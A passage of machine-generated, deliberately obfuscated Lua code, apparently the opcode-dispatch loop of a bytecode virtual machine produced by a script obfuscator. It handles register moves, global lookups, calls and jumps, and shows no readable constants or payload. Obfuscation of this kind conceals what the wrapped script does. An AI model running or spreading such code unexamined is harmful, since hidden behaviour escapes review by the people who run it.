then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,a-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];elseif i>157 then local o=e[2];local f=l[o+2];local d=l[o]+f;l[o]=d;if f>0 then if d<=l[o+1]then n=n+e[3];l[o+3]=d;end;elseif d>=l[o+1]then n=n+e[3];l[o+3]=d;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];if(l[e[3]]<f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=169 then if i<=163 then if i<=160 then if i>159 then local d=e[2];local n={l[d]()};local f,n=n,#n;n=d+e[4]-2;local e=0;for n=d,n do e=e+1;l[n]=f[e];end;o=n;else local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=161 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]]*l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];elseif i>162 then n=n+e[3];else do return end;end;elseif i<=166 then if i<=164 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>165 then l[e[2]][f[e[3]]]=l[e[4]];else local n=e[2];if n>o then o=n end;l[n]=l[e[3]][l[e[4]]];end;elseif i<=167 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];elseif i>168 then n=n+e[3];else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];end;elseif i<=175 then if i<=172 then if i<=170 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];elseif i>171 then local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;else n=n+e[3];end;elseif i<=173 then local o=e[2];local f=e[4];local e=o+2;local d={l[o](l[o+1],l[e])};for n=1,f do l[e+n]=d[n];end;local o=l[o+3];if o then l[e]=o else n=n+1;end;elseif i>174 then local e=e[2];l[e]();o=e-1;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=178 then if i<=176 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;elseif i>177 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;else if(l[e[3]]==f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=179 then local o=e[2];local f=l[o+2];local d=l[o]+f;l[o]=d;if f>0 then if d<=l[o+1]then n=n+e[3];l[o+3]=d;end;elseif d>=l[o+1]then n=n+e[3];l[o+3]=d;end;elseif i>180 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else if(l[e[3]]==l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=272 then if i<=226 then if i<=203 then if i<=192 then if i<=186 then if i<=183 then if i>182 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=184 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>185 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];end;elseif i<=189 then if i<=187 then local i=e[2];l[i]();o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local a={l[i](c(t,1,a-i))};local r,a=a,#a;a=i+e[4]-2;h=0;for e=i,a do h=h+1;l[e]=r[h];end;o=a;n=n+1;e=d[n];i=e[2];s=l[e[3]];l[i+1]=s;l[i]=s[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};h=0;a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;elseif i>188 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=190 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;elseif i>191 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];else local e=e[2];l[e]();o=e-1;end;elseif i<=197 then if i<=194 then if i>193 then local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;else local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];end;elseif i<=195 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>196 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;else local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=200 then if i<=198 then local t;local t=e[2];local s={};local i=0;local a=t+e[3]-1;for e=t+1,a do i=i+1;s[i]=l[e];end;local r={l[t](c(s,1,a-t))};local A,a=r,#r;a=t+e[4]-2;i=0;for e=t,a do i=i+1;l[e]=A[i];end;o=a;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];s={};i=0;a=t+e[3]-1;for e=t+1,a do i=i+1;s[i]=l[e];end;r={l[t](c(s,1,a-t))};A,a=r,#r;a=t+e[4]-2;i=0;for e=t,a do i=i+1;l[e]=A[i];end;o=a;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]]*l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];elseif i>199 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][l[e[4]]];else local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];end;elseif i<=201 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]]*l[e[4]];elseif i>202 then local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if(l[e[3]]~=l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=214 then if i<=208 then if i<=205 then if i>204 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local n=e[2];if n>o then o=n end;l[n]=l[e[3]];end;elseif i<=206 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];elseif i>207 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];else local n=e[2];if n>o then o=n end;l[n]=f[e[3]];end;elseif i<=211 then if i<=209 then local n=e[2];if n>o then o=n end;l[n]=#l[e[3]];elseif i>210 then local i=e[2];l[i]();o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local s={l[i](c(t,1,s-i))};local A,s=s,#s;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;l[i](c(t,1,s-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else h()[f[e[3]]]=l[e[2]];n=n+1;e=d[n];local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];if not l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=212 then local n;local d=e[2];local f={};local n=0;local e=d+e[3]-1;for e=d+1,e do n=n+1;f[n]=l[e];end;local e={l[d](c(f,1,e-d))};local f,e=e,#e;e=e+d-1;n=0;for e=d,e do n=n+1;l[e]=f[n];end;o=e;elseif i>213 then local f=Q[e[3]];local t;if f[5]~=0 then local e={};t=Z({},{__index=function(l,n)local e=e[n];return e[1][e[2]];end,__newindex=function(o,n,l)local e=e[n]e[1][e[2]]=l;end;});for o=1,f[5]do n=n+1;local n=d[n];if n[1]==204 then e[o-1]={l,n[3]};else e[o-1]={K,n[3]};end;r[#r+1]=e;end;end;local e=e[2];if e>o then o=e end;l[e]=A(f,t,Env);else n=n+e[3];end;elseif i<=220 then if i<=217 then if i<=215 then if(l[e[3]]==f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>216 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local n;i=e[2];t={};local n=0;local d=i+e[3]-1;for e=i+1,d do n=n+1;t[n]=l[e];end;local d={l[i](c(t,1,d-i))};local f,d=d,#d;d=i+e[4]-2;n=0;for e=i,d do n=n+1;l[e]=f[n];end;o=d;else local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if(l[e[3]]~=l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=218 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];local n;i=e[2];t={};local n=0;local e=i+e[3]-1;for e=i+1,e do n=n+1;t[n]=l[e];end;l[i](c(t,1,e-i));o=i-1;elseif i>219 then local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=223 then if i<=221 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>222 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];A=l[e[3]];l[i+1]=A;l[i]=A[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};Z,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]]*l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];end;elseif i<=224 then local n=e[2];if n>o then o=n 